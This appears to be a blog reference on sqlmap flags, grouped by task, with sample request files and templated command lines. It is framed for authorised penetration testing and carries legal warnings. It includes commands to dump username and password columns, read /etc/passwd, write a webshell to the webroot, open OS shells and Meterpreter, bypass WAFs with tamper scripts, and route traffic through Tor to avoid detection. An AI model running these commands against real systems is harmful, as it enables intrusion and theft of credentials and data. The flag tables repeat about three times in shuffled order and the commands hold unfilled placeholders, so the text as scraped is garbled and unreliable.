sqlmap ships with hundreds of flags. I use maybe forty of them regularly. This is the field reference for the ones that matter, grouped by the task I am trying to accomplish, with a short note on when each one is worth reaching for.
If you are new to sqlmap, the sqlmap tutorial walking through an attack against a vulnerable app is the right next stop. If you are comparing tools, the best SQL injection tools list for 2026 covers the alternatives. For the underlying mechanics, the SQL injection deep dive has the full taxonomy.
Authorisation required
Use these techniques only on systems you own or have written authorisation to test. Unauthorised access to a computer system is a crime in nearly every jurisdiction (US: Computer Fraud and Abuse Act. UK: Computer Misuse Act 1990. EU: Directive 2013/40/EU). This article assumes a sanctioned engagement or a lab environment you control. If you do not have permission, do not run these commands against anything you find on the internet.
sqlmap Command Reference Every flag organised by task. Copy and adapt.
Target specification -u 'https://target.example/product?id=1'Single URL with query string. Test every parameter unless --param-filter or -p restricts.
-r request.txtUse a saved HTTP request file. Captured from DevTools or any intercepting proxy. Preserves headers, cookies, method, body.
--har=traffic.harRead requests from a HAR file exported by Chrome/Firefox DevTools. sqlmap prompts which request to test.
-l burp.xmlParse Burp/WebScarab XML log and test every request in it.
-m urls.txtMultiple URLs from a file, one per line.
-g 'inurl:product.php?id='Google dork to find targets. Use carefully (rate limits, legality).
--data='username=foo&password=bar'POST body. Forces method=POST. Use * to mark explicit injection points.
-p id,nameTest only these parameters. Cuts noise on multi-param endpoints.
--skip=token,csrfSkip parameters likely to be tokens or anti-CSRF noise.
Request shaping --cookie='session=abc; PHPSESSID=xyz'Send cookies. Required for any authenticated endpoint.
--cookie-del=';'Cookie delimiter override. Default is ';'.
--headers='X-Forwarded-For: 127.0.0.1\nX-API-Key: foo'Add custom headers (\n separator). Useful for header-based injection points.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than --headers for one or two values.
--user-agent='Mozilla/5.0 ...'Override default sqlmap UA (which is fingerprinted by most WAFs).
--random-agentPick a random UA from textual/user-agents.txt per session.
--referer='https://target.example/'Set Referer. Some apps validate it.
--auth-type=Basic --auth-cred='user:pass'HTTP Basic/Digest/NTLM auth.
--proxy='http://127.0.0.1:8080'Route through a proxy. Burp's default port for traffic inspection.
--method=PUT --data='{...}'Custom HTTP method (REST APIs).
Detection tuning --level=5How thorough the test is. 1 (default) to 5. Higher levels test more injection points (headers, cookies). 3+ tests every header.
--risk=3How destructive the payloads are. 1 (default, safe) to 3 (UPDATE/OR-based, can change rows). Use 3 only on lab targets.
--technique=BEUSTQRestrict techniques. B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline. Default tests all.
--time-sec=10Sleep duration for time-based payloads. Increase on noisy networks.
--union-cols=10Force a column count for union-based tests. Skip the auto-detect phase if you already know it.
--dbms=mysqlSkip DBMS fingerprinting. Faster and avoids false-positives if you already know the backend.
--os=linuxHint OS for file-system/OS-command payloads.
--prefix="'" --suffix="-- -"Override default payload boundary. Useful in awkward injection contexts.
--string='Welcome back'True-condition match. Tells boolean-blind what to look for in the page.
--not-string='Invalid'False-condition match (inverse of above).
--code=200True-condition HTTP status code.
DBMS fingerprinting and info --bannerDBMS version banner.
--current-userCurrently connected DB user.
--current-dbCurrently selected database.
--hostnameDB server hostname.
--is-dbaIs current user a DBA? Determines whether OS/file payloads are realistic.
--privileges -U usernameList privileges of a specific user (or current user if -U not set).
--rolesRoles of the current user.
Enumeration --tables -D dbnameList tables in a database.
--columns -D dbname -T tablenameList columns in a table.
--schemaFull schema (all DBs, all tables, all columns). Heavy.
--count -D dbname -T tablenameRow count without dumping.
--search -T usersFind tables matching a name across all DBs.
--search -C password,passwd,pwdFind columns matching common credential names.
Dumping data --dump -D dbname -T tablenameDump all rows of a table.
--dump -D dbname -T users -C username,passwordDump specific columns only. Less noise, less data.
--dump-all --exclude-sysdbsDump everything except system databases.
--start=1 --stop=100Row range. Pagination when the table is huge.
--where="username='admin'"WHERE clause filter. Target a specific row.
--sql-query='SELECT version()'Run arbitrary SQL. Sometimes faster than the enumeration flags for one-off queries.
--sql-shellInteractive SQL prompt against the injected query.
File system access --file-read=/etc/passwdRead a file from the DB server. Requires FILE privilege on MySQL, equivalent elsewhere.
--file-write=local.php --file-dest=/var/www/html/shell.phpWrite a local file to the DB server's filesystem. Webroot writes lead to webshells.
--search-file=*.confLocate files on the DB server matching a pattern (some backends only).
OS command execution --os-cmd='whoami'Run a single OS command on the DB server. Needs DBA and a usable mechanism (xp_cmdshell, UDFs, etc.).
--os-shellInteractive OS shell.
--os-pwnAttempt to get Meterpreter via UDF/stored proc trickery. Lab use.
Session, speed, and output --batchNon-interactive, take all defaults. Required for CI/scripted use.
--threads=10Concurrency. Higher = faster but noisier. Default 1.
-v 3Verbosity 0-6. 3 shows injected payloads; 5 shows raw HTTP.
--flush-sessionDiscard cached state for this target. Start fresh.
--fresh-queriesRe-run cached query results.
-oTurn on all optimisations (--keep-alive, --null-connection, --threads=3).
--output-dir=./outWhere to save the session, log, and dumps. Default ~/.local/share/sqlmap.
--dump-format=CSVOutput format: CSV, HTML, or SQLITE.
Anonymity --torRoute through Tor. Requires a local SOCKS proxy (default 127.0.0.1:9050).
--tor-port=9050Override Tor SOCKS port.
--tor-type=SOCKS5SOCKS4, SOCKS5, or HTTP.
--check-torVerify Tor is actually being used before testing. Use this. DNS leaks are silent otherwise.
--delay=2Seconds between requests. Slow down to look human and avoid rate limits.
--timeout=30Request timeout.
--retries=3Retries on timeout/connection error.
Evasion and tamper --tamper=between,randomcase,space2commentApply tamper scripts to obfuscate payloads. Chainable comma-separated list.
--skip-wafSkip the heuristic WAF detection step. Faster on known-WAF targets.
--identify-wafRun only the WAF identification step. Tells you which product is in front.
--hppHTTP parameter pollution. Splits payload across duplicate parameters.
--chunkedSend POST body via Transfer-Encoding: chunked. Some WAFs do not reassemble correctly.
--null-connectionUse HEAD requests for true/false detection. Faster, sometimes evades content-based WAFs.
Useful tamper scripts (use with --tamper) betweenReplaces > with NOT BETWEEN 0 AND #. Bypasses filters blocking > and =.
space2commentReplaces spaces with /**/. Bypasses naive space-blocking WAFs.
space2plusReplaces spaces with +. URL-encoded space alternative.
randomcaseRandom case for keywords: UnIoN sElEcT. Bypasses case-sensitive blacklists.
charencodeURL-encode payload characters.
charunicodeencodeUnicode-encode keywords.
apostrophenullencodeReplaces ' with %00%27. Some WAFs miss the null byte.
equaltolikeReplaces = with LIKE. Bypasses = blacklists.
ifnull2ifisnullMySQL-specific: IFNULL → IF(ISNULL()).
modsecurityversionedWraps payload in MySQL versioned comments /*!50000UNION*/. Old ModSec bypass.
halfversionedmorekeywordsAdds versioned comments before each keyword. MySQL only.
Target specification -u 'https://target.example/product?id=1'Single URL with query string. Test every parameter unless --param-filter or -p restricts.
-r request.txtUse a saved HTTP request file. Captured from DevTools or any intercepting proxy. Preserves headers, cookies, method, body.
--har=traffic.harRead requests from a HAR file exported by Chrome/Firefox DevTools. sqlmap prompts which request to test.
-l burp.xmlParse Burp/WebScarab XML log and test every request in it.
-m urls.txtMultiple URLs from a file, one per line.
-g 'inurl:product.php?id='Google dork to find targets. Use carefully (rate limits, legality).
--data='username=foo&password=bar'POST body. Forces method=POST. Use * to mark explicit injection points.
-p id,nameTest only these parameters. Cuts noise on multi-param endpoints.
--skip=token,csrfSkip parameters likely to be tokens or anti-CSRF noise.
Detection tuning --level=5How thorough the test is. 1 (default) to 5. Higher levels test more injection points (headers, cookies). 3+ tests every header.
--risk=3How destructive the payloads are. 1 (default, safe) to 3 (UPDATE/OR-based, can change rows). Use 3 only on lab targets.
--technique=BEUSTQRestrict techniques. B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline. Default tests all.
--time-sec=10Sleep duration for time-based payloads. Increase on noisy networks.
--union-cols=10Force a column count for union-based tests. Skip the auto-detect phase if you already know it.
--dbms=mysqlSkip DBMS fingerprinting. Faster and avoids false-positives if you already know the backend.
--os=linuxHint OS for file-system/OS-command payloads.
--prefix="'" --suffix="-- -"Override default payload boundary. Useful in awkward injection contexts.
--string='Welcome back'True-condition match. Tells boolean-blind what to look for in the page.
--not-string='Invalid'False-condition match (inverse of above).
--code=200True-condition HTTP status code.
Dumping data --dump -D dbname -T tablenameDump all rows of a table.
--dump -D dbname -T users -C username,passwordDump specific columns only. Less noise, less data.
--dump-all --exclude-sysdbsDump everything except system databases.
--start=1 --stop=100Row range. Pagination when the table is huge.
--where="username='admin'"WHERE clause filter. Target a specific row.
--sql-query='SELECT version()'Run arbitrary SQL. Sometimes faster than the enumeration flags for one-off queries.
--sql-shellInteractive SQL prompt against the injected query.
OS command execution --os-cmd='whoami'Run a single OS command on the DB server. Needs DBA and a usable mechanism (xp_cmdshell, UDFs, etc.).
--os-shellInteractive OS shell.
--os-pwnAttempt to get Meterpreter via UDF/stored proc trickery. Lab use.
Anonymity --torRoute through Tor. Requires a local SOCKS proxy (default 127.0.0.1:9050).
--tor-port=9050Override Tor SOCKS port.
--tor-type=SOCKS5SOCKS4, SOCKS5, or HTTP.
--check-torVerify Tor is actually being used before testing. Use this. DNS leaks are silent otherwise.
--delay=2Seconds between requests. Slow down to look human and avoid rate limits.
--timeout=30Request timeout.
--retries=3Retries on timeout/connection error.
Useful tamper scripts (use with --tamper) betweenReplaces > with NOT BETWEEN 0 AND #. Bypasses filters blocking > and =.
space2commentReplaces spaces with /**/. Bypasses naive space-blocking WAFs.
space2plusReplaces spaces with +. URL-encoded space alternative.
randomcaseRandom case for keywords: UnIoN sElEcT. Bypasses case-sensitive blacklists.
charencodeURL-encode payload characters.
charunicodeencodeUnicode-encode keywords.
apostrophenullencodeReplaces ' with %00%27. Some WAFs miss the null byte.
equaltolikeReplaces = with LIKE. Bypasses = blacklists.
ifnull2ifisnullMySQL-specific: IFNULL → IF(ISNULL()).
modsecurityversionedWraps payload in MySQL versioned comments /*!50000UNION*/. Old ModSec bypass.
halfversionedmorekeywordsAdds versioned comments before each keyword. MySQL only.
Request shaping --cookie='session=abc; PHPSESSID=xyz'Send cookies. Required for any authenticated endpoint.
--cookie-del=';'Cookie delimiter override. Default is ';'.
--headers='X-Forwarded-For: 127.0.0.1\nX-API-Key: foo'Add custom headers (\n separator). Useful for header-based injection points.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than --headers for one or two values.
--user-agent='Mozilla/5.0 ...'Override default sqlmap UA (which is fingerprinted by most WAFs).
--random-agentPick a random UA from textual/user-agents.txt per session.
--referer='https://target.example/'Set Referer. Some apps validate it.
--auth-type=Basic --auth-cred='user:pass'HTTP Basic/Digest/NTLM auth.
--proxy='http://127.0.0.1:8080'Route through a proxy. Burp's default port for traffic inspection.
--method=PUT --data='{...}'Custom HTTP method (REST APIs).
DBMS fingerprinting and info --bannerDBMS version banner.
--current-userCurrently connected DB user.
--current-dbCurrently selected database.
--hostnameDB server hostname.
--is-dbaIs current user a DBA? Determines whether OS/file payloads are realistic.
--privileges -U usernameList privileges of a specific user (or current user if -U not set).
--rolesRoles of the current user.
Enumeration --tables -D dbnameList tables in a database.
--columns -D dbname -T tablenameList columns in a table.
--schemaFull schema (all DBs, all tables, all columns). Heavy.
--count -D dbname -T tablenameRow count without dumping.
--search -T usersFind tables matching a name across all DBs.
--search -C password,passwd,pwdFind columns matching common credential names.
File system access --file-read=/etc/passwdRead a file from the DB server. Requires FILE privilege on MySQL, equivalent elsewhere.
--file-write=local.php --file-dest=/var/www/html/shell.phpWrite a local file to the DB server's filesystem. Webroot writes lead to webshells.
--search-file=*.confLocate files on the DB server matching a pattern (some backends only).
Session, speed, and output --batchNon-interactive, take all defaults. Required for CI/scripted use.
--threads=10Concurrency. Higher = faster but noisier. Default 1.
-v 3Verbosity 0-6. 3 shows injected payloads; 5 shows raw HTTP.
--flush-sessionDiscard cached state for this target. Start fresh.
--fresh-queriesRe-run cached query results.
-oTurn on all optimisations (--keep-alive, --null-connection, --threads=3).
--output-dir=./outWhere to save the session, log, and dumps. Default ~/.local/share/sqlmap.
--dump-format=CSVOutput format: CSV, HTML, or SQLITE.
Evasion and tamper --tamper=between,randomcase,space2commentApply tamper scripts to obfuscate payloads. Chainable comma-separated list.
--skip-wafSkip the heuristic WAF detection step. Faster on known-WAF targets.
--identify-wafRun only the WAF identification step. Tells you which product is in front.
--hppHTTP parameter pollution. Splits payload across duplicate parameters.
--chunkedSend POST body via Transfer-Encoding: chunked. Some WAFs do not reassemble correctly.
--null-connectionUse HEAD requests for true/false detection. Faster, sometimes evades content-based WAFs.
Target specification -u 'https://target.example/product?id=1'Single URL with query string. Test every parameter unless --param-filter or -p restricts.
-r request.txtUse a saved HTTP request file. Captured from DevTools or any intercepting proxy. Preserves headers, cookies, method, body.
--har=traffic.harRead requests from a HAR file exported by Chrome/Firefox DevTools. sqlmap prompts which request to test.
-l burp.xmlParse Burp/WebScarab XML log and test every request in it.
-m urls.txtMultiple URLs from a file, one per line.
-g 'inurl:product.php?id='Google dork to find targets. Use carefully (rate limits, legality).
--data='username=foo&password=bar'POST body. Forces method=POST. Use * to mark explicit injection points.
-p id,nameTest only these parameters. Cuts noise on multi-param endpoints.
--skip=token,csrfSkip parameters likely to be tokens or anti-CSRF noise.
Detection tuning --level=5How thorough the test is. 1 (default) to 5. Higher levels test more injection points (headers, cookies). 3+ tests every header.
--risk=3How destructive the payloads are. 1 (default, safe) to 3 (UPDATE/OR-based, can change rows). Use 3 only on lab targets.
--technique=BEUSTQRestrict techniques. B=Boolean, E=Error, U=Union, S=Stacked, T=Time, Q=Inline. Default tests all.
--time-sec=10Sleep duration for time-based payloads. Increase on noisy networks.
--union-cols=10Force a column count for union-based tests. Skip the auto-detect phase if you already know it.
--dbms=mysqlSkip DBMS fingerprinting. Faster and avoids false-positives if you already know the backend.
--os=linuxHint OS for file-system/OS-command payloads.
--prefix="'" --suffix="-- -"Override default payload boundary. Useful in awkward injection contexts.
--string='Welcome back'True-condition match. Tells boolean-blind what to look for in the page.
--not-string='Invalid'False-condition match (inverse of above).
--code=200True-condition HTTP status code.
Dumping data --dump -D dbname -T tablenameDump all rows of a table.
--dump -D dbname -T users -C username,passwordDump specific columns only. Less noise, less data.
--dump-all --exclude-sysdbsDump everything except system databases.
--start=1 --stop=100Row range. Pagination when the table is huge.
--where="username='admin'"WHERE clause filter. Target a specific row.
--sql-query='SELECT version()'Run arbitrary SQL. Sometimes faster than the enumeration flags for one-off queries.
--sql-shellInteractive SQL prompt against the injected query.
OS command execution --os-cmd='whoami'Run a single OS command on the DB server. Needs DBA and a usable mechanism (xp_cmdshell, UDFs, etc.).
--os-shellInteractive OS shell.
--os-pwnAttempt to get Meterpreter via UDF/stored proc trickery. Lab use.
Anonymity --torRoute through Tor. Requires a local SOCKS proxy (default 127.0.0.1:9050).
--tor-port=9050Override Tor SOCKS port.
--tor-type=SOCKS5SOCKS4, SOCKS5, or HTTP.
--check-torVerify Tor is actually being used before testing. Use this. DNS leaks are silent otherwise.
--delay=2Seconds between requests. Slow down to look human and avoid rate limits.
--timeout=30Request timeout.
--retries=3Retries on timeout/connection error.
Useful tamper scripts (use with --tamper) betweenReplaces > with NOT BETWEEN 0 AND #. Bypasses filters blocking > and =.
space2commentReplaces spaces with /**/. Bypasses naive space-blocking WAFs.
space2plusReplaces spaces with +. URL-encoded space alternative.
randomcaseRandom case for keywords: UnIoN sElEcT. Bypasses case-sensitive blacklists.
charencodeURL-encode payload characters.
charunicodeencodeUnicode-encode keywords.
apostrophenullencodeReplaces ' with %00%27. Some WAFs miss the null byte.
equaltolikeReplaces = with LIKE. Bypasses = blacklists.
ifnull2ifisnullMySQL-specific: IFNULL → IF(ISNULL()).
modsecurityversionedWraps payload in MySQL versioned comments /*!50000UNION*/. Old ModSec bypass.
halfversionedmorekeywordsAdds versioned comments before each keyword. MySQL only.
Request shaping --cookie='session=abc; PHPSESSID=xyz'Send cookies. Required for any authenticated endpoint.
--cookie-del=';'Cookie delimiter override. Default is ';'.
--headers='X-Forwarded-For: 127.0.0.1\nX-API-Key: foo'Add custom headers (\n separator). Useful for header-based injection points.
-H 'Authorization: Bearer eyJ...'Single header (repeatable). Cleaner than --headers for one or two values.
--user-agent='Mozilla/5.0 ...'Override default sqlmap UA (which is fingerprinted by most WAFs).
--random-agentPick a random UA from textual/user-agents.txt per session.
--referer='https://target.example/'Set Referer. Some apps validate it.
--auth-type=Basic --auth-cred='user:pass'HTTP Basic/Digest/NTLM auth.
--proxy='http://127.0.0.1:8080'Route through a proxy. Burp's default port for traffic inspection.
--method=PUT --data='{...}'Custom HTTP method (REST APIs).
DBMS fingerprinting and info --bannerDBMS version banner.
--current-userCurrently connected DB user.
--current-dbCurrently selected database.
--hostnameDB server hostname.
--is-dbaIs current user a DBA? Determines whether OS/file payloads are realistic.
--privileges -U usernameList privileges of a specific user (or current user if -U not set).
--rolesRoles of the current user.
Enumeration --tables -D dbnameList tables in a database.
--columns -D dbname -T tablenameList columns in a table.
--schemaFull schema (all DBs, all tables, all columns). Heavy.
--count -D dbname -T tablenameRow count without dumping.
--search -T usersFind tables matching a name across all DBs.
--search -C password,passwd,pwdFind columns matching common credential names.
File system access --file-read=/etc/passwdRead a file from the DB server. Requires FILE privilege on MySQL, equivalent elsewhere.
--file-write=local.php --file-dest=/var/www/html/shell.phpWrite a local file to the DB server's filesystem. Webroot writes lead to webshells.
--search-file=*.confLocate files on the DB server matching a pattern (some backends only).
Session, speed, and output --batchNon-interactive, take all defaults. Required for CI/scripted use.
--threads=10Concurrency. Higher = faster but noisier. Default 1.
-v 3Verbosity 0-6. 3 shows injected payloads; 5 shows raw HTTP.
--flush-sessionDiscard cached state for this target. Start fresh.
--fresh-queriesRe-run cached query results.
-oTurn on all optimisations (--keep-alive, --null-connection, --threads=3).
--output-dir=./outWhere to save the session, log, and dumps. Default ~/.local/share/sqlmap.
--dump-format=CSVOutput format: CSV, HTML, or SQLITE.
Evasion and tamper --tamper=between,randomcase,space2commentApply tamper scripts to obfuscate payloads. Chainable comma-separated list.
--skip-wafSkip the heuristic WAF detection step. Faster on known-WAF targets.
--identify-wafRun only the WAF identification step. Tells you which product is in front.
--hppHTTP parameter pollution. Splits payload across duplicate parameters.
--chunkedSend POST body via Transfer-Encoding: chunked. Some WAFs do not reassemble correctly.
--null-connectionUse HEAD requests for true/false detection. Faster, sometimes evades content-based WAFs.
req.txt is a raw HTTP request file: method line, headers, blank line, body. Most of my commands use -r req.txt because it carries the entire request shape (method, headers, cookies, body) without re-typing. Here is what it actually looks like:
GET /product?id=1 HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9
Accept-Language: en-US,en;q=0.9
Cookie: session=eyJhbGciOiJIUzI1NiJ9...; PHPSESSID=q9k2...
Connection: close
POST requests look the same with the method and body added:
POST /login HTTP/1.1
Host: target.example
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 29
Cookie: PHPSESSID=q9k2...
Connection: close
username=admin&password=test
No special markers, no per-parameter annotations. sqlmap tests every parameter it finds in the request unless you restrict with -p. Mark a specific injection point with * only if you want to force sqlmap there.
You do not need Burp Suite for this. The DevTools built into Chrome and Firefox can produce everything sqlmap needs. Two paths, easiest first:
Easiest: save a HAR and skip writing req.txt by hand.
Open DevTools: F12 on Windows/Linux, Cmd+Option+I on macOS.
Open the Network tab. Enable Preserve log so a navigation does not wipe the captured requests.
Trigger the target request in the page (click the link, submit the form, hit the API).
Right-click any captured request in the list. In Chrome pick Save all as HAR with content . In Firefox pick Save All As HAR . Save as traffic.har.
Point sqlmap at the HAR directly with --har instead of -r:
sqlmap --har=traffic.har --batch sqlmap lists every request it found in the HAR and asks which one to test. Pick the one carrying the parameter you want to probe. From then on the workflow is identical to the req.txt examples below, just swap -r req.txt for --har=traffic.har.
If you prefer an actual req.txt (worth the extra step when you want to hand-edit headers or insert a * injection-point marker):
Same DevTools / Network tab setup.
Click the request you want to capture. In Chrome open the Headers tab inside that request's panel; in Firefox the Headers tab is the default.
Copy the request method line and every request header into a text file. The browsers display them in the right order already.
Add a blank line, then the request body (if any). For POST forms that is the URL-encoded body. For JSON APIs it is the raw JSON.
Save as req.txt. Use with -r req.txt in every example below.
If you want a shortcut for the manual path: right-click the request → Copy → Copy as cURL (both browsers support this). The cURL command contains the URL, every header, and the body. You can either run that through a converter (curlconverter --language http <command> from npm, or any online cURL-to-HTTP tool) or just read it and assemble req.txt by hand: cURL's -H "Foo: bar" flags become header lines verbatim, --data 'x=y' becomes the body, and the URL gives you the method line.
A few command lines I use as starting points and adapt from. The first batch uses the captured request file from the section above. The simpler ones below take a -u URL directly when you just need a quick probe.
Edit the values once and every example updates. The User-Agent dropdown defaults to --random-agent because the literal sqlmap default UA is signatured by every commercial WAF.
Reset Tune the common flags once. Every command below reads from this. Out-of-range values get a red border. The Googlebot UA usually gets you hard-blocked faster than the default; pick it only when you know the target trusts crawlers.
Simplest possible probe , just a URL with a query string. Good for a first sanity check before you bother capturing a request:
sqlmap -u ':target_url' --batch :ua --level=:level --risk=:riskPOST request with form data , no req.txt needed. Forces --method=POST because --data is set:
sqlmap -u 'https://target.example/login' \
--data='username=admin&password=test' \
--batch :ua --level=:level --risk=:riskPOST with a JSON body (REST APIs). Mark the explicit injection point with * if more than one field is parsable:
sqlmap -u 'https://api.target.example/v1/users/search' \
--method=POST \
--headers='Content-Type: application/json' \
--data='{"q":"foo*","limit":10}' \
--batch :ua --level=:level --risk=:riskFirst pass against a captured request , light touch, defaults, see if anything is obvious:
sqlmap -r req.txt --batch :ua --level=:level --risk=:riskAuthenticated app, scoped to specific parameters (cookies come from req.txt):
sqlmap -r req.txt --batch -p user_id,product_id :ua \
--level=:level --risk=:risk --threads=:threadsBehind a WAF, slow and quiet (tamper chain layered on top):
sqlmap -r req.txt --batch :ua --delay=:delay --threads=:threads \
--tamper=between,randomcase,space2comment --time -sec=10 Through Tor, paranoid mode (covered in detail in the sqlmap with Tor and proxychains guide ):
sqlmap -r req.txt --batch --tor --tor-type=SOCKS5 --check-tor \
:ua --delay=:delay --threads=:threads --timeout=60 Once injection is confirmed, the typical enumeration sequence. These take database and table names that vary per target, so they stay non-interactive:
sqlmap -r req.txt --batch --dbms=mysql --current-db sqlmap -r req.txt --batch --dbms=mysql --tables -D target_db sqlmap -r req.txt --batch --dbms=mysql --columns -D target_db -T users sqlmap -r req.txt --batch --dbms=mysql --dump -D target_db -T users -C username,password --batch keeps it scriptable. --dbms=mysql skips the fingerprint step once you know the answer.
For completeness, a short list of flags that exist but rarely earn their keep in real engagements:
--predict-output, slows things down without changing results in most cases.--crawl=N, sqlmap's own crawler is weak. Use a real crawler (ffuf, hakrawler, gospider) then feed the URLs in.--check-internet, adds round trips. If your connection is broken, you will know.
Every flag above is dual use. The same --dump that exfiltrates a production user table is the one I run against my own lab targets fifty times a week. Use these against systems you own or are explicitly authorised to test. See the authorisation block at the top and the legal-framing notes in the SQL injection deep dive .
What is the difference between --level and --risk in sqlmap?
Why does sqlmap not find an injection that I found manually?
Can I run sqlmap in CI to test my own apps?
Is the default sqlmap User-Agent really detected by every WAF?
